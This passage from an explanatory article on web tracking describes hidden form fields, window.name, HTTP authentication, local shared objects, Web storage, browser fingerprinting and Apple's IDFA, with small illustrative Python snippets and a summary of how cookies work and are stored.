This approach has two advantages from a tracking perspective: first, because the tracking information is placed in the HTML source code and in the POST body rather than in the URL, the average user will not notice it; second, the session information is not copied when the user copies the URL (to save the page to disk or send it by email, for example).
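A hidden-field round trip can be sketched as follows. The field name sid, the /checkout action and the helper names are hypothetical; the sketch only shows that the identifier is written into the HTML and read back from a URL-encoded POST body.

```python
from html import escape
from typing import Optional
from urllib.parse import parse_qs


def render_form(session_id: str) -> str:
    """Return an HTML form that carries the session ID in a hidden field."""
    safe_id = escape(session_id, quote=True)  # avoid breaking out of the attribute
    return (
        '<form method="post" action="/checkout">\n'
        f'  <input type="hidden" name="sid" value="{safe_id}">\n'
        '  <input type="submit" value="Continue">\n'
        "</form>"
    )


def session_id_from_post_body(body: str) -> Optional[str]:
    """Extract the hidden field from an application/x-www-form-urlencoded body."""
    values = parse_qs(body).get("sid")
    return values[0] if values else None


print(render_form("abc123"))
print(session_id_from_post_body("sid=abc123&item=42"))
```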
window.name
All common web browsers can store a fairly large amount of data (2 MB to 32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also available across domains. The technique can be coupled with JSON objects to store a complex set of session variables on the client side.
The disadvantage is that each separate window or tab initially has an empty window.name; with tabbed browsing, this means that tabs opened individually by the user will not have a window name. In addition, window.name can be used to track visitors across different sites, which can pose a privacy issue.
In some respects, this can be more secure than cookies: because the data is not sent to the server, it is not exposed to the network sniffing attacks that cookies are vulnerable to. However, unless special measures are taken to protect the data, it is vulnerable to other attacks, as the data is available to other sites opened in the same window.
HTTP Authentication
HTTP includes the basic access authentication and digest access authentication protocols, which allow access to a web page only when the user has given the correct username and password. If the server requires such credentials to grant access to a web page, the browser requests them from the user and, once they are obtained, stores them and sends them in all subsequent HTTP requests. This information can be used to track the user.
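For basic access authentication, the value the browser resends with every request is simply the username and password joined by a colon and encoded in Base64. The sketch below uses hypothetical helper names; the credentials are example values.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header a browser sends for basic authentication."""
    credentials = f"{username}:{password}".encode("utf-8")
    token = base64.b64encode(credentials).decode("ascii")
    return f"Authorization: Basic {token}"


def decode_basic_auth(header: str) -> tuple:
    """Recover (username, password) from the header, as a server would."""
    token = header.split("Basic ", 1)[1]
    decoded = base64.b64decode(token).decode("utf-8")
    username, password = decoded.split(":", 1)  # the password may contain colons
    return username, password


header_line = basic_auth_header("Aladdin", "open sesame")
print(header_line)
print(decode_basic_auth(header_line))
```

Because the same header accompanies each request, the server can correlate requests by username much as it would with a cookie. Base64 is an encoding, not encryption, so the credentials are readable by anyone who observes an unencrypted connection.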
Local shared objects
If a browser includes the Adobe Flash Player plugin, local shared objects can be used for the same purpose as cookies. They can be an attractive choice for web developers because:
- the default size limit for a local shared object is 100 KB;
- security controls are separate from user cookie controls (so local shared objects may be allowed when cookies are not).
This last point, the separation between the cookie management policy and that of Adobe’s local shared objects, raises questions about how users manage their privacy settings: users must be aware that their cookie settings have no effect on local shared objects, and vice versa.
Another criticism of this system concerns the fact that it can only be used through the Adobe Flash Player plugin which is proprietary and is not a web standard.
Client-side persistence
Some web browsers support script-based persistence mechanisms, which allow a page to store information locally for later use. Internet Explorer, for example, supports persistent information in the browser history, in favorites, in an XML store, or directly within a web page saved on disk. For Microsoft Internet Explorer 5, a user-data method is available through DHTML behaviors.
In HTML5, the W3C introduced a new JavaScript API for client-side data storage called Web storage, intended to replace cookies permanently. It is similar to cookies but offers a much greater capacity and does not send the stored information in the headers of HTTP requests. The API provides two types of web storage, local storage and session storage, which are similar to persistent cookies and session cookies respectively (with the difference that session cookies expire when the browser is closed, whereas session storage variables expire when the tab is closed). Web storage is supported by Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 and Opera 10.50.
A different mechanism relies on the browser cache (which keeps files in memory rather than reloading them) and on JavaScript programs included in web pages. For example, a page might contain the tag <script type="text/javascript" src="example.js">. The first time the page loads, the program example.js is also loaded. From then on, the program remains cached and is not reloaded when the page is visited again.
As a result, if the program contains a global variable (e.g. var id = 3243242;), this identifier remains valid and can be used by other JavaScript code once the page is loaded again, or once any page that links to the program is loaded. The major disadvantage of this method is that the JavaScript global variable must be static, which means that it cannot be changed or deleted like a cookie.
Web browser fingerprint
A browser fingerprint is information collected about a browser’s configuration settings for identification purposes. These fingerprints can be used to fully or partially identify an Internet user or device even when cookies are disabled.
Basic information about the configuration of web browsers has long been collected by web analytics services with the aim of accurately measuring human traffic on the web and detecting various forms of click fraud. With the help of client-side scripting languages, much more precise information gathering is now possible. Converting this information into a bit string produces a device fingerprint. In 2010, the Electronic Frontier Foundation (EFF) measured the entropy of a browser’s fingerprint to be at least 18.1 bits, and that was before advances in canvas fingerprinting added 5.7 bits to that entropy.
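To make these figures concrete, the sketch below hashes a set of configuration attributes into a fixed-length fingerprint and converts an entropy in bits into the approximate number of browsers among which one fingerprint is expected to be unique. The attribute names, the use of SHA-256 and the helper names are assumptions for illustration; they are not the EFF’s method.

```python
import hashlib


def fingerprint(attributes: dict) -> str:
    """Hash browser attributes into a hex string; key order does not matter."""
    canonical = "\n".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def browsers_per_fingerprint(entropy_bits: float) -> float:
    """With H bits of entropy, roughly one browser in 2**H shares a fingerprint."""
    return 2.0 ** entropy_bits


# Hypothetical attribute values a script might collect.
sample = {
    "user_agent": "ExampleBrowser/1.0",
    "screen": "1920x1080x24",
    "timezone": "UTC+1",
    "fonts": "Arial,Courier,Times",
}

print(fingerprint(sample))
print(round(browsers_per_fingerprint(18.1)))        # about one browser in this many
print(round(browsers_per_fingerprint(18.1 + 5.7)))  # with the canvas bits added
```

Each additional bit of entropy doubles the size of the population in which a fingerprint is expected to be unique, which is why a few extra bits from canvas fingerprinting matter.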
Advertiser ID (IDFA)
Apple uses a tracking technique called “identifier for advertisers” (IDFA). This technique assigns a unique identifier to each user of a device running iOS (e.g. iPhone or iPad). This identifier is then used by Apple’s advertising network, iAd, to determine which ads users are viewing and responding to.
In brief
Cookies are small text files stored by the web browser on the hard drive of a website’s visitor, and are used (among other things) to record information about the visitor or the visitor’s path through the site. The webmaster can thus recognize a visitor’s habits and personalize the presentation of the site for each visitor; for example, cookies make it possible to remember how many articles must be displayed on the home page, or to retain the login credentials for a private area: when the visitor returns to the site, there is no need to type a name and password again to be recognized, since they are automatically read from the cookie.
A cookie has a limited lifespan, set by the site designer. It can also expire at the end of the session on the site, which corresponds to the closing of the browser. Cookies are widely used to simplify visitors’ lives and present them with more relevant information. But special techniques make it possible to follow a visitor across several sites and thus to collect and cross-check very extensive information about that visitor’s habits. This method has given cookies a reputation as a surveillance technique that violates the privacy of visitors, which unfortunately matches reality in the many cases where cookies are used for reasons that are not technical or that do not respect users’ expectations.
In response to these legitimate fears, HTML 5 introduces a new client-side data storage JavaScript API called Web storage, much safer and with greater capacity, which aims to replace cookies.
Storage of cookies
With some browsers, a cookie is easy to modify, since a text editor (e.g., Notepad) is enough to change its values manually.
Cookies are stored differently depending on the browser:
- Microsoft Internet Explorer saves each cookie in a different file;
- Mozilla Firefox saves all its cookies in a single file;
- Opera saves all its cookies in a single file and encrypts it (the cookies cannot be modified except through the software options);
- Apple Safari saves all its cookies in a single file with the “.plist” extension. Modification is possible but very difficult, unless you go through the software options.
Browsers are required to support at least:
- 300 simultaneous cookies;
- 4,096 bytes per cookie;
- 20 cookies per host or domain.
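These minimums can be turned into a simple check that a site’s cookies stay within what every browser is expected to accept. The sketch is an assumption-based illustration: the function name is hypothetical, and the size of a cookie is approximated here by the byte length of its name=value pair, ignoring attributes.

```python
MIN_TOTAL_COOKIES = 300      # simultaneous cookies
MIN_BYTES_PER_COOKIE = 4096  # bytes per cookie
MIN_COOKIES_PER_HOST = 20    # cookies per host or domain


def within_minimum_limits(cookies_by_host: dict) -> bool:
    """Check a {host: {name: value}} mapping against the minimum limits."""
    total = 0
    for host, cookies in cookies_by_host.items():
        if len(cookies) > MIN_COOKIES_PER_HOST:
            return False
        for name, value in cookies.items():
            # Approximation: only the name=value pair is measured.
            if len(f"{name}={value}".encode("utf-8")) > MIN_BYTES_PER_COOKIE:
                return False
        total += len(cookies)
    return total <= MIN_TOTAL_COOKIES


small_jar = {"example.com": {"sid": "abc123", "lang": "en"}}
oversized_jar = {"example.com": {"blob": "x" * 5000}}
print(within_minimum_limits(small_jar))
print(within_minimum_limits(oversized_jar))
```

Staying under these figures only guarantees portability; individual browsers may accept more.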
